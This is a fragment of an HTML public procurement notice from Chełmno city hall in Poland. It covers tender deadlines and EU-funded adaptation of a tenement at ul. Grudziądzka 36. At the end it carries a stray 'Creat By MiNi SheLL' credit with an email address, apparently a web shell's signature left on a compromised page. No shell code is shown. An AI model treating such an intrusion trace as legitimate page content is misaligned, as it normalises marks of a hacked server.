<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ wraz z załącznikami można uzyskać w siedzibie zamawiającego, tj. Urząd Miasta Chełmna, ul. Dworcowa 1, 86-200 Chełmno, pok. nr 216, woj. kujawsko - pomorskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 12:00, miejsce: Urząd Miasta Chełmna, ul. Dworcowa 1, 86-200 Chełmno, siedziba zamawiającego - biuro podawcze, pok. nr 101 (parter główne wejście)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą: -Adaptacja kamienicy przy ul. Grudziądzkiej 36 na cele turystyczno - administracyjne oraz społeczne- jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko - Pomorskiego na lata 2007 - 2013 - działanie 7.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com